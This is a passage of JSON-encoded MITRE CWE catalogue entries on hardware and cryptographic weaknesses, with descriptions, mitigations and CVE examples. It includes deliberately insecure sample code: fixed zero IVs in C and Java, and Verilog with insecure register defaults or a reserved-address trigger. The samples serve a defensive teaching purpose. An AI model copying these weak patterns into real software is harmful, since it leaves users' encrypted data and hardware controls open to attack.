a\\n policy, then the policy should be immutable or protected with\\n clear authentication and authorization."}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"113"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1193":{"attr":{"@_ID":"1193","@_Name":"Power-On of Untrusted Execution Core Before Enabling Fabric Access Control","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product enables components that contain untrusted firmware before memory and fabric access controls have been enabled.","Extended_Description":{"xhtml:p":"After initial reset, System-on-Chip (SoC) fabric access controls and other\\n security features need to be programmed by trusted firmware as part\\n of the boot sequence. If untrusted IPs or peripheral microcontrollers\\n\\t are enabled first, then the untrusted component can master\\n transactions on the hardware bus and target memory or other assets to\\n compromise the SoC boot firmware."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Likelihood":"High","Note":"An untrusted component can master transactions on the HW bus and target memory or other assets to compromise the SoC boot firmware."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"The boot sequence should enable fabric access controls and memory protections before enabling third-party hardware IPs and peripheral microcontrollers that use untrusted firmware."}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1130"}},{"attr":{"@_External_Reference_ID":"REF-1042"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated References, Related_Attack_Patterns"}}},"1204":{"attr":{"@_ID":"1204","@_Name":"Generation of Weak Initialization Vector (IV)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses a cryptographic primitive that uses an Initialization\\n\\t\\t\\tVector (IV), but the product does not generate IVs that are\\n\\t\\t\\tsufficiently unpredictable or unique according to the expected\\n\\t\\t\\tcryptographic requirements for that primitive.","Extended_Description":"By design, some cryptographic primitives\\n\\t\\t\\t (such as block ciphers) require that IVs\\n\\t\\t\\t must have certain properties for the\\n\\t\\t\\t uniqueness and/or unpredictability of an\\n\\t\\t\\t IV. Primitives may vary in how important\\n\\t\\t\\t these properties are. If these properties\\n\\t\\t\\t are not maintained, e.g. by a bug in the\\n\\t\\t\\t code, then the cryptography may be weakened\\n\\t\\t\\t or broken by attacking the IVs themselves.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"If the IV is not properly initialized, data that is encrypted can be compromised and information about the data can be leaked. See [REF-1179]."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":{"xhtml:p":["Different cipher\\n\\t\\t\\t modes have different requirements for\\n\\t\\t\\t their IVs. When choosing and implementing\\n\\t\\t\\t a mode, it is important to understand\\n\\t\\t\\t those requirements in order to keep\\n\\t\\t\\t security guarantees intact. Generally, it\\n\\t\\t\\t is safest to generate a random IV, since\\n\\t\\t\\t it will be both unpredictable and have a\\n\\t\\t\\t very low chance of being non-unique. IVs\\n\\t\\t\\t do not have to be kept secret, so if\\n\\t\\t\\t generating duplicate IVs is a concern, a\\n\\t\\t\\t list of already-used IVs can be kept and\\n\\t\\t\\t checked against.","NIST offers recommendations on generation of IVs for modes of which they have approved. These include options for when random IVs are not practical. For CBC, CFB, and OFB, see [REF-1175]; for GCM, see [REF-1178]."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-143"},"Intro_Text":"In the following examples, CBC mode is used when encrypting data:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"EVP_CIPHER_CTX ctx;char key[EVP_MAX_KEY_LENGTH];char iv[EVP_MAX_IV_LENGTH];RAND_bytes(key, b);memset(iv,0,EVP_MAX_IV_LENGTH);EVP_EncryptInit(&ctx,EVP_bf_cbc(), key,iv);","xhtml:br":["","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class SymmetricCipherTest {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public static void main() {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"byte[] text =\\"Secret\\".getBytes();byte[] iv ={};KeyGenerator kg = KeyGenerator.getInstance(\\"DES\\");kg.init(56);SecretKey key = kg.generateKey();Cipher cipher = Cipher.getInstance(\\"DES/CBC/PKCS5Padding\\");IvParameterSpec ips = new IvParameterSpec(iv);cipher.init(Cipher.ENCRYPT_MODE, key, ips);return cipher.doFinal(inpBytes);","xhtml:br":["","","","","","","","",""],"xhtml:div":{"#text":"0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00","attr":{"@_style":"margin-left:10px;"}}}}}}}}],"Body_Text":"In both of these examples, the initialization vector (IV) is always a block of zeros. This makes the resulting cipher text much more predictable and susceptible to a dictionary attack."},{"Intro_Text":"The Wired Equivalent Privacy (WEP) protocol used in the 802.11\\n\\t\\t\\t wireless standard only supported 40-bit keys, and the IVs were only 24\\n\\t\\t\\t bits, increasing the chances that the same IV would be reused for\\n\\t\\t\\t multiple messages. The IV was included in plaintext as part of the packet, making\\n\\t\\t\\t it directly observable to attackers. Only 5000 messages are needed\\n\\t\\t\\t before a collision occurs due to the \\"birthday paradox\\" [REF-1176]. Some\\n\\t\\t\\t implementations would reuse the same IV for each packet. This IV reuse\\n\\t\\t\\t made it much easier for attackers to recover plaintext from\\n\\t\\t\\t two packets with the same IV, using well-understood attacks,\\n\\t\\t\\t especially if the plaintext was known for one of the packets [REF-1175]."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-1472","Description":"ZeroLogon vulnerability - use of a static IV of all zeroes in AES-CFB8 mode","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472"},{"Reference":"CVE-2011-3389","Description":"BEAST attack in SSL 3.0 / TLS 1.0. In CBC mode, chained initialization vectors are non-random, allowing decryption of HTTPS traffic using a chosen plaintext attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389"},{"Reference":"CVE-2001-0161","Description":"wireless router does not use 6 of the 24 bits for WEP encryption, making it easier for attackers to decrypt traffic","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0161"},{"Reference":"CVE-2001-0160","Description":"WEP card generates predictable IV values, making it easier for attackers to decrypt traffic","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0160"},{"Reference":"CVE-2017-3225","Description":"device bootloader uses a zero initialization vector during AES-CBC","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3225"},{"Reference":"CVE-2016-6485","Description":"crypto framework uses PHP rand function - which is not cryptographically secure - for an initialization vector","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6485"},{"Reference":"CVE-2014-5386","Description":"encryption routine does not seed the random number generator, causing the same initialization vector to be generated repeatedly","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5386"},{"Reference":"CVE-2020-5408","Description":"encryption functionality in an authentication framework uses a fixed null IV with CBC mode, allowing attackers to decrypt traffic in applications that use this functionality","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5408"},{"Reference":"CVE-2017-17704","Description":"messages for a door-unlocking product use a fixed IV in CBC mode, which is the same after each restart","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17704"},{"Reference":"CVE-2017-11133","Description":"application uses AES in CBC mode, but the pseudo-random secret and IV are generated using math.random, which is not cryptographically strong.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11133"},{"Reference":"CVE-2007-3528","Description":"Blowfish-CBC implementation constructs an IV where each byte is calculated modulo 8 instead of modulo 256, resulting in less than 12 bits for the effective IV length, and less than 4096 possible IV values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3528"}]},"Functional_Areas":{"Functional_Area":"Cryptography"},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"20"}},{"attr":{"@_CAPEC_ID":"97"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1175","@_Section":"3. Risks of Keystream Reuse"}},{"attr":{"@_External_Reference_ID":"REF-1175","@_Section":"Appendix C"}},{"attr":{"@_External_Reference_ID":"REF-1176"}},{"attr":{"@_External_Reference_ID":"REF-1177"}},{"attr":{"@_External_Reference_ID":"REF-1178","@_Section":"8.2 IV Constructions"}},{"attr":{"@_External_Reference_ID":"REF-1179"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t\\t\\t predictability can vary widely. Within the developer and other\\n\\t\\t\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t\\t\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t\\t\\t measurement. There are no commonly-used definitions, even within\\n\\t\\t\\t standards documents and cryptography papers. Future versions of\\n\\t\\t\\t CWE will attempt to define these terms and, if necessary,\\n\\t\\t\\t distinguish between them in ways that are appropriate for\\n\\t\\t\\t different communities but do not reduce the usability of CWE for\\n\\t\\t\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2021-03-09"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes, Observed_Examples, References"}}},"1209":{"attr":{"@_ID":"1209","@_Name":"Failure to Disable Reserved Bits","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The reserved bits in a hardware design are not disabled prior to production. Typically, reserved bits are used for future capabilities and should not support any functional logic in the design. However, designers might covertly use these bits to debug or further develop new capabilities in production hardware. Adversaries with access to these bits will write to them in hopes of compromising hardware state.","Extended_Description":{"xhtml:p":"Reserved bits are labeled as such so they can be allocated for a later purpose. They are not to do anything in the current design. However, designers might want to use these bits to debug or control/configure a future capability to help minimize time to market (TTM). If the logic being controlled by these bits is still enabled in production, an adversary could use the logic to induce unwanted/unsupported behavior in the hardware."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The Designer and Implementer have to make a conscious choice to do this"},{"Phase":"Implementation","Note":"The Designer and Implementer have to make a conscious choice to do this"},{"Phase":"Documentation","Note":"If documentation labels anything \\"for future use\\", \\"reserved\\", or the like, such labeling could indicate to an attacker a potential attack point"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Varies by Context","Note":"This type of weakness all depends on the capabilities of the logic being controlled or configured by the reserved bits"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"Include a feature to disable reserved bits."}},{"Phase":"Integration","Description":{"xhtml:p":"Any writes to these reserve bits are blocked (e.g., ignored, access-protected, etc.), or an exception can be asserted."}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"An adversary may perform writes to reserve space in hopes to change the behavior of the hardware.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":{"#text":"// Assume an IP has address space 0x0-0x0F for its configuration registers, with the last one labeled reserved (i.e. 0x0F). Therefore inside the Finite State Machine (FSM), the code is as follows:reg gpio_out = 0; //gpio should remain low for normal operationcase (register_address)4\'b1111 : //0x0Fbegingpio_out = 1;end","xhtml:br":["","","","","","","",""]}},{"attr":{"@_Nature":"informative"},"xhtml:div":{"#text":"reg gpio_out = 0; //gpio should remain low for normal operationcase (register_address)//4\'b1111 : //0x0Fdefault: gpio_out = gpio_out;","xhtml:br":["","",""]}}],"Body_Text":"In the code above, the GPIO pin should remain low for normal operation. However, it can be asserted by accessing the reserved address space (0x0F). This may be a concern if the GPIO state is being used as an indicator of health (e.g. if asserted the hardware may respond by shutting down or resetting the system which may not be the correct action the system should perform)."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"121"}}},"Content_History":{"Submission":{"Submission_Name":"Brent Sherman","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-06"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1220":{"attr":{"@_ID":"1220","@_Name":"Insufficient Granularity of Access Control","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product implements access controls via a policy or other feature with the intention to disable or restrict accesses (reads and/or writes) to assets in a system from untrusted agents. However, implemented access controls lack required granularity, which renders the control policy too broad because it allows accesses from unauthorized agents to the security-sensitive assets.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware engines can expose accesses to assets (device configuration, keys, etc.) to trusted firmware or a software module (commonly set by BIOS/bootloader). This access is typically access-controlled. Upon a power reset, the hardware or system usually starts with default values in registers, and the trusted firmware (Boot firmware) configures the necessary access-control protection.","A common weakness that can exist in such protection schemes is that access controls or policies are not granular enough. This condition allows agents beyond trusted agents to access assets and could lead to a loss of functionality or the ability to set up the device securely. This further results in security risks from leaked, sensitive, key material to modification of device configuration."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware implementation and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Other"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":{"xhtml:ul":{"xhtml:li":["Access-control-policy protections must be reviewed for design inconsistency and common weaknesses.","Access-control-policy definition and programming flow must be tested in pre-silicon, post-silicon testing."]}},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":{"xhtml:p":["Consider a system with a register for storing AES key for encryption or decryption. The key is 128 bits, implemented as a set of four 32-bit registers. The key registers are assets and registers, AES_KEY_READ_POLICY and AES_KEY_WRITE_POLICY, and are defined to provide necessary access controls.","The read-policy register defines which agents can read the AES-key registers, and write-policy register defines which agents can program or write to those registers. Each register is a 32-bit register, and it can support access control for a maximum of 32 agents. The number of the bit when set (i.e., \\"1\\") allows respective action from an agent whose identity matches the number of the bit and, if \\"0\\" (i.e., Clear), disallows the respective action to that corresponding agent."]},"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0",{"#text":"AES key [0:31] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_1",{"#text":"AES key [32:63] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_2",{"#text":"AES key [64:95] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_4",{"#text":"AES key [96:127] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_KEY_READ_WRITE_POLICY","[31:0] Default 0x00000006 - meaning agent with identities \\"1\\" and \\"2\\" can both read from and write to key registers"]}]}},{"attr":{"@_Nature":"mitigation"},"xhtml:table":{"xhtml:tr":[{"xhtml:td":["AES_KEY_READ_POLICY","[31:0] Default 0x00000002 - meaning only Crypto engine with identity \\"1\\" can read registers: AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3"]},{"xhtml:td":["AES_KEY_WRITE_POLICY","[31:0] Default 0x00000004 - meaning only trusted firmware with identity \\"2\\" can program registers: AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3"]}]}}],"Body_Text":["In the above example, there is only one policy register that controls access to both read and write accesses to the AES-key registers, and thus the design is not granular enough to separate read and writes access for different agents. Here, agent with identities \\"1\\" and \\"2\\" can both read and write.","A good design should be granular enough to provide separate access controls to separate actions. Access control for reads should be separate from writes. Below is an example of such implementation where two policy registers are defined for each of these actions. The policy is defined such that: the AES-key registers can only be read or used by a crypto agent with identity \\"1\\" when bit #1 is set. The AES-key registers can only be programmed by a trusted firmware with identity \\"2\\" when bit #2 is set."]},{"Intro_Text":"Consider the following SoC\\n\\t design. The sram in HRoT has an address range that is readable and writable by unprivileged\\n\\t software and it has an area that is only readable by unprivileged software. The tbus\\n\\t interconnect enforces access control for slaves on the bus but uses only one bit to control\\n\\t both read and write access. Address 0xA0000000 - 0xA000FFFF is readable and writable\\n\\t by the untrusted cores core{0-N} and address 0xA0010000 - 0xA001FFFF is only\\n\\t readable by the untrusted cores core{0-N}.","Body_Text":{"xhtml:img":{"attr":{"@_src":"https://cwe.mitre.org/data/images/HRoT-CWE.png","@_alt":"Hardware Root of Trust"}},"xhtml:p":["The security policy access control is not granular enough, as it uses one bit to enable both\\n\\t read and write access. This gives write access to an area that should only be readable\\n\\t by unprivileged agents.","Access control logic should differentiate between read and write access and to have\\n\\t sufficient address granularity."]}}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-05"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-07-16","Contribution_Comment":"Provided Demonstrative Example for Hardware Root of Trust"}}},"1221":{"attr":{"@_ID":"1221","@_Name":"Incorrect Register Defaults or Module Parameters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Hardware description language code incorrectly defines register defaults or hardware IP parameters to insecure values.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to defined default values that are hard coded in the hardware description language (HDL) code of the hardware unit. Hardware descriptive languages also support definition of parameter variables, which can be defined in code during instantiation of the hardware IP module. Such parameters are generally used to configure a specific instance of a hardware IP in the design.","The system security settings of a hardware design can be affected by incorrectly defined default values or IP parameters. The hardware IP would be in an insecure state at power reset, and this can be exposed or exploited by untrusted software running on the system. Both register defaults and parameters are hardcoded values, which cannot be changed using software or firmware patches but must be changed in hardware silicon. Thus, such security issues are considerably more difficult to address later in the lifecycle. Hardware designs can have a large number of such parameters and register defaults settings, and it is important to have design tool support to check these settings in an automated way and be able to identify which settings are security sensitive."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Such issues could be introduced during implementation of hardware design, since IP parameters and defaults are defined in HDL code and identified later during Testing or System Configuration phases."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":"Varies by Context","Note":"Degradation of system functionality, or loss of access control enforcement can occur."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"During hardware design, all the system parameters and register defaults must be reviewed to identify security sensitive settings."},{"Phase":"Implementation","Description":"The default values of these security sensitive settings need to be defined as part of the design review phase."},{"Phase":"Testing","Description":"Testing phase should use automated tools to test that values are configured per design specifications."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider example design module system verilog code shown below.register_example module is an example parameterized module that defines two parameters, REGISTER_WIDTH and REGISTER_DEFAULT. Register_example module defines a Secure_mode setting, which when set makes the register content read-only and not modifiable by software writes. register_top module instantiates two registers, Insecure_Device_ID_1 and Insecure_Device_ID_2. Generally, registers containing device identifier values are required to be read only to prevent any possibility of software modifying these values.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"// Parameterized Register module example// Secure_mode : REGISTER_DEFAULT[0] : When set to 1 register is read only and not writable///module register_examples#(parameter REGISTER_WIDTH = 8, // Parameter defines width of register, default 8 bitsparameter [REGISTER_WIDTH-1:0] REGISTER_DEFAULT = 2**REGISTER_WIDTH -2 // Default value of register computed from Width. Sets all bits to 1s except bit 0 (Secure _mode))(input [REGISTER_WIDTH-1:0] Data_in,input Clk,input resetn,input write,output reg [REGISTER_WIDTH-1:0] Data_out);reg Secure_mode;always @(posedge Clk or negedge resetn)if (~resetn)beginData_out <= REGISTER_DEFAULT; // Register content set to Default at resetSecure_mode <= REGISTER_DEFAULT[0]; // Register Secure_mode set at resetendelse if (write & ~Secure_mode)beginData_out <= Data_in;endendmodulemodule register_top(input Clk,input resetn,input write,input [31:0] Data_in,output reg [31:0] Secure_reg,output reg [31:0] Insecure_reg);register_example #(.REGISTER_WIDTH (32),.REGISTER_DEFAULT (1224) // Incorrect Default value used bit 0 is 0.) Insecure_Device_ID_1 (.Data_in (Data_in),.Data_out (Secure_reg),.Clk (Clk),.resetn (resetn),.write (write));register_example #(.REGISTER_WIDTH (32) // Default not defined 2^32-2 value will be used as default.) Insecure_Device_ID_2 (.Data_in (Data_in),.Data_out (Insecure_reg),.Clk (Clk),.resetn (resetn),.write (write));endmodule","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","",""]}},{"attr":{"@_Nature":"informative"},"xhtml:div":{"#text":"register_example #(.REGISTER_WIDTH (32),.REGISTER_DEFAULT (1225) // Correct default value set, to enable Secure_mode) Secure_Device_ID_example (.Data_in (Data_in),.Data_out (Secure_reg),.Clk (Clk),.resetn (resetn),.write (write));","xhtml:br":["","","","","","","","",""]}}],"Body_Text":["These example instantiations show how, in a hardware design, it would be possible to instantiate the register module with insecure defaults and parameters.","In the example design, both registers will be software writable since Secure_mode is defined as zero."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"166"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-12-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1222":{"attr":{"@_ID":"1222","@_Name":"Insufficient Granularity of Address Regions Protected by Register Locks","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product defines a large address region protected from modification by the same register lock control bit. This results in a conflict between the functional requirement that some addresses need to be writable by software during operation and the security requirement that the system configuration lock bit must be set during the boot process.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware IPs can expose the device configuration controls that need to be programmed after device power reset by a trusted firmware or software module (commonly set by BIOS/bootloader) and then locked from any further modification. In hardware design, this is commonly implemented using a programmable lock bit which enables/disables writing to a protected set of registers or address regions. When the programmable lock bit is set, the relevant address region can be implemented as a hardcoded value in hardware logic that cannot be changed later.","A problem can arise wherein the protected region definition is not granular enough. After the programmable lock bit has been set, then this new functionality cannot be implemented without change to the hardware design."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1220","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"Such issues are introduced during hardware architecture and design since software controls and configuration are defined during these phases and identified later during Testing or System Configuration phases."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Other","Note":"System security configuration cannot be defined in a way that does not conflict with functional requirements of device."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":["The defining of protected locked registers should be reviewed or tested early in the design phase with software teams to ensure software flows are not blocked by the security locks.","As an alternative to using register lock control bits and fixed access control regions, the hardware design could use programmable security access control configuration so that device trusted firmware can configure and change the protected regions based on software usage and security models."]}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"For example, consider a hardware unit with a 32 kilobyte configuration address space where the first 8 kilobyte address contains security sensitive controls that must only be writable by device bootloader. One way to protect the security configuration could be to define a 32 bit system configuration locking register (SYS_LOCK) where each bit lock locks the corresponding 1 kilobyte region.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:table":[{"xhtml:tbody":{"xhtml:tr":[{"xhtml:th":["Address","Register"]},{"xhtml:td":[0,"SYS_LOCK: 32 bit system configuration lock register, each bit is write-1-once"]},{"xhtml:td":[4,"SECURITY_FEATURE_ENABLE: 32 bit register controlling enabling of security features"]},{"xhtml:td":["...",""]},{"xhtml:td":[784,"SW_MODE: 32 bit Software Mode indication register"]}]}},{"xhtml:tbody":{"xhtml:tr":[{"xhtml:th":["Address region","Lock bit"]},{"xhtml:td":["0x0000 - 0x03FF","SYS_LOCK[0]"]},{"xhtml:td":["0x0400 - 0x07FF","SYS_LOCK[1]"]},{"xhtml:td":["...",""]},{"xhtml:td":["0x7C00 - 0x7FFF","SYS_LOCK[31]"]}]}}]},"Body_Text":"If a register exists within the first kilobyte address range (e.g. SW_MODE, address 0x310) and needs to be software writable at runtime, then this register cannot be written in a securely configured system since SYS_LOCK register lock bit 0 must be set to protect other security settings (e.g. SECURITY_FEATURE_ENABLE, address 0x0004). The only fix would be to change the hardware logic or not set the security lock bit."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-12-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1223":{"attr":{"@_ID":"1223","@_Name":"Race Condition for Write-Once 